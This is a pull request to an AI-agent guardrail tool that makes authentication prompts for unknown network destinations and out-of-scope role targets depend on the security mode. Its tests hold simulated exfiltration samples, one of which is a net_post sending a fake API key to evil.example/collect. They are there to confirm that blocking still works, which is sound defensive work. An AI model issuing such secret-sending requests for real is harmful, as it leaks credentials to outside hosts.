### PR TITLE
fix(policy): mode-gate unknown-destination / out-of-scope AUTH (calm over-triggering)

### DIFF
--- a/README.md
+++ b/README.md
@@ -302,12 +302,14 @@ Set a mode in `.doberman/policies.yaml` or via `doberman policy set-mode <mode>`
 
 | Mode | Best for | Bulk-delete threshold | Step-up for unknown destinations | Step-up for behavioral anomalies | Lethal-trifecta exfil |
 |---|---|---|---|---|---|
-| **Light** | Exploratory / trusted environments | 100 files | Yes | No | AUTH |
-| **Balanced** *(default)* | Everyday coding agents | 25 files | Yes | Yes | AUTH |
+| **Light** | Exploratory / trusted environments | 100 files | No | No | AUTH |
+| **Balanced** *(default)* | Everyday coding agents | 25 files | No | Yes | AUTH |
 | **Strict** | Production repos, shared codebases | 10 files | Yes | Yes | **BLOCK** |
 | **Paranoid** | Highly autonomous or security-critical agents | 3 files | Yes | Yes | **BLOCK** |
 
 > Hard blocks (secret exfiltration, destructive commands, role-boundary violations, smuggled-token-channel exfiltration) are **identical in every mode**. The mode dial only affects where step-up authentication is required for ambiguous or high-risk actions.
+>
+> **Unknown network destinations** step up to authentication only in Strict/Paranoid. Light and Balanced treat a plain unknown host (e.g. fetching a docs site or an API) as allowed — that AUTH fired on almost every web fetch and was the top source of benign prompts. This relaxes the *destination-alone* signal only: a secret leaving to **any** host is still a hard block (secrets rule + raise-only combine, every mode), and the sharper destination smells (credentials embedded in the URL, raw IP addresses, unresolvable hosts) still step up in every mode. An **out-of-scope role target** likewise steps up in Balanced/Strict/Paranoid but is relaxed in Light; a role-**blocked** target is a hard block in every mode.
 >
 > One escalation is mode-gated: the **lethal trifecta** — sensitive data **and** untrusted-content provenance **and** an external destination — steps up to authentication in Light/Balanced, and is a hard **BLOCK** in Strict/Paranoid. Those high-security modes refuse this serious-exfil pattern outright rather than leaving it to a confirmation prompt that alert fatigue could rubber-stamp.
 

--- a/src/doberman/engine/rules/destinations.py
+++ b/src/doberman/engine/rules/destinations.py
@@ -1,11 +1,14 @@
 """External-destination rule (Feature 3, slice 3.5).
 
 Steps up authentication when an action sends data to a destination Doberman
-does not recognize as trusted. On its own an unknown destination is ``AUTH``;
-combined with secret material (the secrets rule) the engine's raise-only
-``combine`` turns the pair into a ``BLOCK`` — that is how "upload the repo to an
-unknown endpoint" becomes a hard block without this rule needing to know about
-secrets.
+does not recognize as trusted. On its own an unknown destination is ``AUTH`` in
+Strict/Paranoid and ``PASS`` in Light/Balanced (mode flag
+``escalate_unknown_destination``); combined with secret material (the secrets
+rule) the engine's raise-only ``combine`` turns the pair into a ``BLOCK`` in
+every mode — that is how "upload the repo to an unknown endpoint" becomes a hard
+block without this rule needing to know about secrets. The sharper destination
+smells below (embedded URL credentials, raw IPs, unresolvable hosts) stay
+``AUTH`` regardless of mode.
 
 Host classification is treated as adversarial. We extract the host from a
 properly parsed URL (never substring-match the raw string) and:
@@ -36,6 +39,7 @@ from doberman.models import (
     SecurityObject,
     Verdict,
 )
+from doberman.policy.modes import thresholds_for
 
 #: Destinations Doberman ships trusting. Overridable (F6 loads from policy).
 #: Registered domains only — subdomains are matched structurally.
@@ -169,6 +173,17 @@ class ExternalDestinationRule:
             )
 
         if _registered_match(host, self._trusted):
+            return GuardrailResult(verdict=Verdict.PASS, risk=Risk.low)
+
+        # A plain unknown host steps up only when the mode says so. Light and
+        # Balanced treat "not on the trusted list" as PASS — this AUTH fired on
+        # every fetch to any host off the small registry allowlist and was the
+        # top source of benign prompts. This is raise-only-safe: it only relaxes
+        # the *destination-alone* signal in lighter modes; the sharper smells
+        # above (embedded credentials, raw IPs, unresolvable hosts) still AUTH in
+        # every mode, and a secret leaving to any host is still a hard block via
+        # the secrets rule + raise-only combine. Strict/Paranoid still AUTH here.
+        if not thresholds_for(getattr(ctx, "mode", "balanced")).escalate_unknown_destination:
             return GuardrailResult(verdict=Verdict.PASS, risk=Risk.low)
 
         return self._auth_unknown(

--- a/src/doberman/engine/rules/role_boundary.py
+++ b/src/doberman/engine/rules/role_boundary.py
@@ -10,8 +10,10 @@ Verdicts (raise-only; the objective guardrail combines this with the other
 rules):
 
 * target classifies as ``blocked`` for the role → ``BLOCK (role_blocked_target)``
+  (a hard floor — never mode-gated)
 * target classifies as ``suspicious`` (incl. out-of-scope-by-default) →
-  ``AUTH (role_out_of_scope)``
+  ``AUTH (role_out_of_scope)`` in Balanced/Strict/Paranoid; ``PASS`` in Light
+  (mode flag ``escalate_out_of_scope``)
 * ``allowed`` / non-path action / no active role → abstain (``PASS``)
 
 SECURITY: the explanation names the role and the boundary class only — never
@@ -36,6 +38,7 @@ from doberman.models import (
     SecurityObject,
     Verdict,
 )
+from doberman.policy.modes import thresholds_for
 from doberman.roles.roles import RoleBoundary, classify
 
 #: Only path-shaped actions are classified against role path globs. A shell or
@@ -115,11 +118,15 @@ class RoleBoundaryRule:
             if worst is RoleBoundary.blocked:
                 break
 
-        return self._verdict_for(worst, role.name)
+        escalate_oos = thresholds_for(getattr(ctx, "mode", "balanced")).escalate_out_of_scope
+        return self._verdict_for(worst, role.name, escalate_out_of_scope=escalate_oos)
 
     @staticmethod
-    def _verdict_for(boundary: RoleBoundary, role_name: str) -> GuardrailResult:
+    def _verdict_for(
+        boundary: RoleBoundary, role_name: str, *, escalate_out_of_scope: bool = True
+    ) -> GuardrailResult:
         if boundary is RoleBoundary.blocked:
+            # A blocked target is a hard floor — never mode-gated.
             return GuardrailResult(
                 verdict=Verdict.BLOCK,
                 risk=Risk.high,
@@ -128,7 +135,10 @@ class RoleBoundaryRule:
                     f"Target is forbidden for the active '{role_name}' role; blocked by role policy."
                 ),
             )
-        if boundary is RoleBoundary.suspicious:
+        if boundary is RoleBoundary.suspicious and escalate_out_of_scope:
+            # An out-of-scope (but not blocked) target only steps up when the
+            # mode escalates it — Light relaxes this to abstain; Balanced and
+            # stricter still AUTH. A blocked target is unaffected (above).
             return GuardrailResult(
                 verdict=Verdict.AUTH,
                 risk=Risk.medium,

--- a/src/doberman/policy/modes.py
+++ b/src/doberman/policy/modes.py
@@ -69,11 +69,23 @@ class ModeThresholds:
 MODES: dict[SecurityMode, ModeThresholds] = {
     SecurityMode.light: ModeThresholds(
         bulk_delete_threshold=100,
+        escalate_out_of_scope=False,
+        escalate_unknown_destination=False,
         escalate_unusual=False,
         abnormality_threshold=1.1,  # unreachable: Light never steps up on abnormality
     ),
     SecurityMode.balanced: ModeThresholds(
         bulk_delete_threshold=25,
+        # A plain unknown network destination on its own no longer steps up in
+        # Balanced (the default) — that AUTH fired on every WebFetch to any host
+        # off the small package-registry allowlist (docs sites, APIs, etc.) and
+        # was the single largest source of benign auth prompts. Secret material
+        # leaving to *any* host is still a hard block via the secrets rule +
+        # raise-only combine, and the sharper destination smells (embedded URL
+        # credentials, raw IPs, unresolvable hosts) still AUTH in every mode.
+        escalate_unknown_destination=False,
+        # Role scope is a deliberate, opt-in constraint, so Balanced still steps
+        # up on an out-of-scope role target (only Light relaxes that).
         abnormality_threshold=0.7,
     ),
     SecurityMode.strict: ModeThresholds(

--- a/tests/integration/test_objective_demo.py
+++ b/tests/integration/test_objective_demo.py
@@ -71,8 +71,11 @@ async def test_catastrophic_command_is_blocked_and_nothing_recorded():
 
 
 async def test_unknown_destination_requires_auth():
+    # A raw-IP destination is unrecognized in every mode (a plain unknown
+    # *hostname* is relaxed to PASS in the default Balanced mode — see
+    # test_rule_destinations.py's mode-gating cases).
     async with proxied_session() as (fake, agent):
-        result = await agent.call_tool("net_get", {"url": "https://unknown.example/x"})
+        result = await agent.call_tool("net_get", {"url": "https://93.184.216.34/x"})
         assert result.isError
         assert "authentication required" in result.content[0].text
         assert fake.calls == []

--- a/tests/unit/test_hosthook_auth_challenge.py
+++ b/tests/unit/test_hosthook_auth_challenge.py
@@ -67,9 +67,12 @@ class _NoChannel:
         raise PrompterUnavailableError("no channel in test")
 
 
-# WebFetch to an unknown external host -> AUTH (unknown_external_destination), a
-# local_auth tier: confirm only, so an approving prompter reaches "allow" with no TOTP.
-_AUTH_CALL = ("WebFetch", {"url": "https://example.com", "prompt": "x"})
+# WebFetch to a raw-IP host -> AUTH (unknown_external_destination), a local_auth
+# tier: confirm only, so an approving prompter reaches "allow" with no TOTP. A raw
+# IP is used (not a bare hostname) so this AUTH fires in every mode — a plain
+# unknown *hostname* is relaxed to PASS in Light/Balanced, but the sharper smells
+# (raw IPs, embedded credentials) stay AUTH regardless of mode.
+_AUTH_CALL = ("WebFetch", {"url": "https://93.184.216.34/", "prompt": "x"})
 
 
 def test_approved_auth_allows_the_one_call(cwd, monkeypatch):

--- a/tests/unit/test_hosthook_claude_pre.py
+++ b/tests/unit/test_hosthook_claude_pre.py
@@ -113,7 +113,7 @@ def test_secret_access_bash_triggers_auth_challenge(cwd):
 def test_auth_denied_reason_points_at_the_dialog(cwd):
     # Built on leemeo3's #70 next-step guidance: an AUTH now invokes Doberman's approval
     # dialog rather than deferring to the harness prompt, so the message points there.
-    reason = _reason(_pre("WebFetch", {"url": "https://example.com", "prompt": "x"}, cwd))
+    reason = _reason(_pre("WebFetch", {"url": "https://93.184.216.34/", "prompt": "x"}, cwd))
     assert "[AUTH]" in reason
     assert "Doberman" in reason and "dialog" in reason
 
@@ -130,8 +130,10 @@ def test_secret_exfil_via_mcp_tool_is_denied(cwd):
 
 
 def test_webfetch_to_external_url_triggers_auth(cwd):
-    # Unknown external destination → AUTH → Doberman challenge (headless: fail-closed deny).
-    out = _pre("WebFetch", {"url": "https://example.com", "prompt": "x"}, cwd)
+    # A raw-IP destination → AUTH → Doberman challenge (headless: fail-closed deny).
+    # (A raw IP AUTHs in every mode; a plain unknown *hostname* is relaxed to PASS
+    # in Light/Balanced — see test_rule_destinations.py's mode-gating cases.)
+    out = _pre("WebFetch", {"url": "https://93.184.216.34/", "prompt": "x"}, cwd)
     assert _permission(out) == "deny"
     assert "[AUTH]" in _reason(out)
 

--- a/tests/unit/test_hosthook_taint_floor.py
+++ b/tests/unit/test_hosthook_taint_floor.py
@@ -128,8 +128,11 @@ def test_missing_session_id_uses_entity_scope_taint(tmp_path):
 
 def test_no_taint_db_does_not_crash_or_fabricate(tmp_path):
     # A fresh repo with no taint store at all: read returns empty, the floor
-    # abstains (no fabricated taint) and the hook does not crash.
-    out = _pre("WebFetch", {"url": _EGRESS_URL}, tmp_path, session_id="fresh")
+    # abstains (no fabricated taint) and the hook does not crash. A raw-IP egress
+    # is used so the objective AUTHs in the default Balanced mode (a plain unknown
+    # host is relaxed to PASS there); the point of this test is the *floor*, not
+    # the destination classification.
+    out = _pre("WebFetch", {"url": "https://93.184.216.34/collect"}, tmp_path, session_id="fresh")
     assert _decision(out) == "deny"  # objective AUTH only (headless challenge denies)
     assert "[AUTH]" in _reason(out)
     assert "multi_step_exfil" not in _reason(out)

--- a/tests/unit/test_normalize_egress.py
+++ b/tests/unit/test_normalize_egress.py
@@ -98,9 +98,14 @@ def test_external_destination_rule_passes_benign_domain_tool():
 
 
 def test_external_destination_rule_auths_unknown_network_host():
-    """An unknown network-request host must still require AUTH."""
+    """An unknown network-request host requires AUTH in Strict/Paranoid.
+
+    (Light/Balanced relax a plain unknown host to PASS — the destination-alone
+    step-up is mode-gated; see test_rule_destinations.py. Secret-exfil to any
+    host is still a hard block regardless of mode.)
+    """
     obj = normalize("net_get", {"url": "https://evil.example/x"})
-    result = ExternalDestinationRule().evaluate(obj, EvalContext())
+    result = ExternalDestinationRule().evaluate(obj, EvalContext(mode="strict"))
     assert result.verdict is Verdict.AUTH, (
         f"Expected AUTH for unknown network host but got {result.verdict}"
     )

--- a/tests/unit/test_role_escalation.py
+++ b/tests/unit/test_role_escalation.py
@@ -37,14 +37,31 @@ def _action(target, action_type=ActionType.file_write, source=SourceContext.unkn
     )
 
 
-def _ctx(role, tmp_path):
-    return EvalContext(role=role, metadata={"repo_root": str(tmp_path)})
+def _ctx(role, tmp_path, mode="balanced"):
+    return EvalContext(role=role, mode=mode, metadata={"repo_root": str(tmp_path)})
 
 
 def test_out_of_scope_path_requires_auth(tmp_path):
     result = RULE.evaluate(_action("src/utils/helper.ts"), _ctx(FRONTEND, tmp_path))
     assert result.verdict is Verdict.AUTH
     assert ReasonCode.role_out_of_scope in result.reason_codes
+
+
+def test_out_of_scope_path_passes_in_light_mode(tmp_path):
+    # Light relaxes the out-of-scope *step-up* (escalate_out_of_scope=False)...
+    result = RULE.evaluate(_action("src/utils/helper.ts"), _ctx(FRONTEND, tmp_path, mode="light"))
+    assert result.verdict is Verdict.PASS
+
+
+def test_role_blocked_path_still_blocks_in_light_mode(tmp_path):
+    # ...but a *blocked* role target is a hard floor — Light must not relax it.
+    role = RoleDefinition(name="scoped", allowed=["app/**"], blocked=["app/secret/**"])
+    result = RULE.evaluate(
+        _action("app/secret/key.txt", action_type=ActionType.file_delete),
+        _ctx(role, tmp_path, mode="light"),
+    )
+    assert result.verdict is Verdict.BLOCK
+    assert ReasonCode.role_blocked_target in result.reason_codes
 
 
 def test_in_scope_path_passes(tmp_path):

--- a/tests/unit/test_rule_destinations.py
+++ b/tests/unit/test_rule_destinations.py
@@ -23,8 +23,8 @@ from doberman.models import (
 RULE = ExternalDestinationRule()
 
 
-def _verdict(url):
-    action = SecurityObject(
+def _dst_action(url):
+    return SecurityObject(
         id="dst-1",
         ts=datetime(2026, 6, 7, tzinfo=timezone.utc),
         agent_role="unknown",
@@ -33,7 +33,14 @@ def _verdict(url):
         target=url,
         external_destination=url,
     )
-    return RULE.evaluate(action, EvalContext())
+
+
+def _verdict(url, mode="strict"):
+    # "Not trusted" is asserted in strict mode, where an unknown host still steps
+    # up to AUTH — that is the property these tests care about (this host is not
+    # mistaken for a trusted one). The Light/Balanced relaxation of the
+    # destination-*alone* signal is exercised separately below.
+    return RULE.evaluate(_dst_action(url), EvalContext(mode=mode))
 
 
 @pytest.mark.parametrize(
@@ -146,7 +153,8 @@ def test_destination_from_target_when_no_external_destination_set():
         target="https://evil.example/x",
         external_destination=None,
     )
-    assert RULE.evaluate(action, EvalContext()).verdict is Verdict.AUTH
+    # strict: the unknown host still steps up (Light/Balanced relax it — see below)
+    assert RULE.evaluate(action, EvalContext(mode="strict")).verdict is Verdict.AUTH
 
 
 def test_empty_destination_string_abstains():
@@ -174,3 +182,59 @@ def test_custom_trusted_hosts_override():
         external_destination="https://internal.corp/api",
     )
     assert rule.evaluate(action, EvalContext()).verdict is Verdict.PASS
+
+
+# --- Mode-gating of the destination-alone signal (calibration) --------------
+# A plain unknown host on its own AUTHs only in Strict/Paranoid; Light/Balanced
+# treat it as PASS (the noisiest benign prompt). The sharper smells and, above
+# all, secret-exfil to any host stay caught — the recall guards below prove it.
+
+
+@pytest.mark.parametrize("mode", ["light", "balanced"])
+def test_unknown_host_passes_in_light_and_balanced(mode):
+    assert _verdict("https://docs.some-tool.dev/guide", mode=mode).verdict is Verdict.PASS
+
+
+@pytest.mark.parametrize("mode", ["strict", "paranoid"])
+def test_unknown_host_auths_in_strict_and_paranoid(mode):
+    result = _verdict("https://docs.some-tool.dev/guide", mode=mode)
+    assert result.verdict is Verdict.AUTH
+    assert ReasonCode.unknown_external_destination in result.reason_codes
+
+
+@pytest.mark.parametrize("mode", ["light", "balanced", "strict", "paranoid"])
+def test_trusted_host_passes_in_every_mode(mode):
+    assert _verdict("https://pypi.org/simple/requests/", mode=mode).verdict is Verdict.PASS
+
+
+@pytest.mark.parametrize("mode", ["light", "balanced", "strict", "paranoid"])
+def test_sharper_smells_auth_in_every_mode(mode):
+    # Embedded URL credentials, raw IPs, and unresolvable hosts are not relaxed
+    # by mode — they stay AUTH even in Light.
+    assert _verdict("https://user:pass@github.com/x", mode=mode).verdict is Verdict.AUTH
+    assert _verdict("https://93.184.216.34/x", mode=mode).verdict is Verdict.AUTH
+    assert _verdict("http://", mode=mode).verdict is Verdict.AUTH
+
+
+def test_secret_to_unknown_host_still_blocks_in_balanced():
+    # THE recall guard: even though the destination rule alone now PASSes an
+    # unknown host in Balanced, the full objective guardrail still hard-BLOCKs a
+    # secret leaving to that host (secrets rule fires secret_exfiltration; the
+    # raise-only combine wins). Relaxing the destination-alone AUTH must not open
+    # an exfil channel.
+    from doberman.engine.objective import ObjectiveGuardrail
+
+    secret = "sk-ant-" + "api03-" + "Qx7mZpKdLnRjWsVfYbHtCmGkAeIuOpZxDkLoQrTsBnJh"  # noqa: S105
+    action = SecurityObject(
+        id="exfil-1",
+        ts=datetime(2026, 6, 7, tzinfo=timezone.utc),
+        agent_role="unknown",
+        action_type=ActionType.network_request,
+        tool_name="net_post",
+        target="https://evil.example/collect",
+        external_destination="https://evil.example/collect",
+    )
+    ctx = EvalContext(mode="balanced", metadata={"raw_arguments": {"body": secret}})
+    result = ObjectiveGuardrail().evaluate(action, ctx)
+    assert result.verdict is Verdict.BLOCK
+    assert ReasonCode.secret_exfiltration in result.reason_codes


### PR DESCRIPTION
## Slice
- Feature / Slice: FPR calibration — Slice A (wire the dead mode knobs). See vault ADR 0027.
- Addresses: user report that Doberman is "way too trigger-happy asking for auth" (the #1 cause: every web fetch to a non-registry host AUTHed in every mode).

## What this PR does
`ModeThresholds.escalate_unknown_destination` and `escalate_out_of_scope` were **defined but never read** — dead code, so `doberman mode light` did nothing for the noisiest AUTH sources. This wires both:

- **`ExternalDestinationRule`**: a plain unknown host steps up only when `escalate_unknown_destination` is set — **Light/Balanced → PASS, Strict/Paranoid → AUTH**. The sharper destination smells (credentials embedded in the URL, raw IP literals, unresolvable hosts) still **AUTH in every mode**.
- **`RoleBoundaryRule`**: an out-of-scope (`suspicious`) target steps up only when `escalate_out_of_scope` is set — **Light → PASS, Balanced/Strict/Paranoid → AUTH**. A role-**blocked** target stays a hard **BLOCK** in every mode.
- **`modes.py`**: Light sets both flags False; Balanced sets `escalate_unknown_destination=False` (keeps out-of-scope escalation — role scope is opt-in); Strict/Paranoid unchanged (both True).

## Why it's raise-only-safe (recall guards, all tested)
Only the *destination-alone* and *out-of-scope-alone* step-ups relax, and only in lighter modes:
- **`test_secret_to_unknown_host_still_blocks_in_balanced`** — a secret to any unknown host is still a hard **BLOCK** (`secret_exfiltration` via the objective raise-only combine), even though the destination rule alone now PASSes it.
- Sharper destination smells (creds-in-URL / raw IP / unresolvable) still AUTH in every mode; a role-blocked target still BLOCKs in Light.
- The floor hard-blocks (`FLOOR_HARD_BLOCKS`) are untouched. Honors ADR 0021 (keep AUTH rare; don't soften the serious hard-blocks).

## Tests added (run in CI)
- `test_rule_destinations.py`: mode-gating (unknown host PASS in light/balanced, AUTH in strict/paranoid), trusted-in-every-mode, sharper-smells-AUTH-in-every-mode, and the secret-exfil recall guard. Existing spoof/homoglyph tests retargeted to **strict mode** so their "not trusted" intent is preserved, not weakened.
- `test_role_escalation.py`: out-of-scope PASS in Light; role-blocked still BLOCK in Light.
- 5 host-hook/integration/normalize fixtures that used a plain unknown *hostname* as an AUTH trigger moved to a **raw IP** (same reason code + tier, AUTHs in every mode) so they still exercise the AUTH path.

## Security checklist
- [x] Fails closed on error / uncertainty
- [x] No secret / full file / unredacted prompt logged or committed
- [x] Raise-only — only removes false-positive step-ups in lighter modes; recall guards prove real threats still fire
- [x] Every BLOCK/AUTH carries reason codes + a human explanation
- [x] doberman-core does not import doberman_enterprise

## Public-release safety (doberman-core only)
- [x] Nothing from the "not allowed" list
- [x] Core still builds/tests/runs with NO enterprise package installed

## Edge cases / Deviations / Risks
- **Deviation:** kept **Balanced** escalating out-of-scope (role scope is opt-in and rarely set; softening it in the default buys ~nothing on the actual complaint — web-fetch AUTHs — while weakening a deliberate constraint). Only Light relaxes out-of-scope. Easy to also soften in Balanced if preferred.
- README mode table + note updated (unknown-destination step-up is now mode-gated; how to get the old always-prompt behavior: `doberman mode strict`).
- Full suite: 1134 passed, 3 skipped, 92% coverage; ruff + lint-imports clean.